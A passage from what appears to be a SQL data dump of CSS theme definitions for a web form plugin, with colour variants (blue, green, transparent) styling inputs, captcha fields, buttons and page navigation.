!important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#fff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:5px solid white !important;\nborder-radius:7px !important;\n}', 0),
(6, 'Style 1 Blue ', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n.wdform_table1 button\n{\n	background-image:none !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:center;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important; \n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#0090E3 !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:19px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder:0px !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:0px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:0px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #ffffff !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#ffffff !important;\n}    \n.page_deactive\n{\ncolor:#000 !important;\nborder:2px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:#fff !important;\nfont-weight: bold !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:2px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#0090E3 !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\nfont-weight: bold !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#0090E3 !important;\nborder-radius:8px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #fff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:2px solid #000 !important;\nbackground-color:#fff !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\nbox-shadow: 0px 0px 10px #000 !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder: 0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:5px solid white !important;\nborder-radius:7px !important;\n}', 0),
(7, 'Style 1 Green', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n.wdform_table1 button\n{\n	background-image:none !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:center;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important; \n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#2A9E19 !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:21px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:17px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder:1px solid #000 !important;\nborder-radius:4px !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.wdform_colon\n{\ncolor:#000 !important;\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000 !important;\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nheight:17px !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\nfont-weight: bold !important;\nfont-size:12px !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\nfont-weight: bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:17px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:17px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:17px !important;\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #000 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000 !important;\nbackground-color:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:#2A9E19 !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#000000 !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#2A9E19 !important;\nborder-radius:11px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:0px !important;\nbackground-color:#000000 !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#fff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:5px solid white !important;\nborder-radius:7px !important;\n}', 0),
(8, 'Style 2 Transparent', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, wdform_table1{\n		border:inherit !important;\n		padding:inherit;\n		margin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\ntable.wdform_table1 {\nborder-collapse: initial !important;\n}\n.wdform_footer td{\ntext-align:center !important;\n}\n .wdform_table1 tbody{\n	 border-collapse:inherit !important;\n }\n.wdform_table2{\n	width:initial;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n .page_numbers{\n	vertical-align:middle !important;\n}\n .wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	margin:inherit !important;\n	border-collapse:inherit !important;\n	padding:inherit !important\n}\n.wdform_table1 tr{\n	margin:inherit !important;\n}\n.wdform_table2 table{\n		width: inherit !important;\n		background-color:inherit !important;\n}\n.file_upload{\n		font-size:12px !important;\n}\n.wdform_table1 button\n{\n		background-image:none !important;\n}\n.calendar, .calendar tr, .calendar td, .calendar table{\n		border-collapse:inherit;\n		padding:inherit;\n		margin:inherit;\n}\n.button, .button_reset, .button_submit{\n		padding-bottom:inherit !important;\n		padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n		text-align:inherit;\n		vertical-align:middle;\n		border:none !important;\n		padding:inherit  !important;\n		margin-bottom: inherit !important;\n		margin-top: inherit !important;\n}\n.wdform_table2 td, .wdform_table2 tr{\n	vertical-align:top !important;\n	text-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n		color:#000;\n		line-height:1 !important;\n		margin-bottom:2px !important;\n		margin-top:2px !important;\n		font-size:inherit !important; \n		display:inline !important;\n        padding-left:inherit !important;\n		padding-right:inherit !important;\n}\n.wdform_table1 input{\n	padding-bottom:2px !important;\n	padding-top:2px !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 10px !important;\nborder: 2px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:transparent !important;\nborder:1px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_input input {\nborder-radius: 0px !important;\nborder-width: 1px !important;\npadding: 1px !important;\nmargin: 1px !important;\nheight: 16px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_select select \n{\nborder-radius: 0px !important;\npadding: 1px !important;\nmargin: 1px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.time_box\n{\nborder-width:1px !important;\nheight:16px !important;\nmargin: 1px !important;\npadding: 1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000 !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\n}\n.wdform_colon\n{\ncolor:#000\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload {\nborder: 0px solid white !important;\nborder-radius: 0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor: black !important;\nbackground-color: white !important;\n} \n.page_deactive\n{\ncolor:#000 !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#E0E0E0 !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nfont-weight:bold !important;\nborder: 3px double black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#ffffff !important;\nbox-shadow: 0px 0px 0px 0px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:20px !important;\nline-height:20px !important;\nbackground-color:#E0E0E0 !important;\nborder-radius: 0em 4em 1em 0em !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: inset -5px 1px 10px 1px #ACB8A6 !important;\n}\n.page_percentage_deactive\n{\nheight:20px !important;\nline-height:20px !important;\nborder:1px solid black !important;\nbackground-color:#ffffff !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:5px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F53E04 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F53E04 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color: #F53E04 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#F53E04 !important;\nborder: 0px solid  #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}', 0),
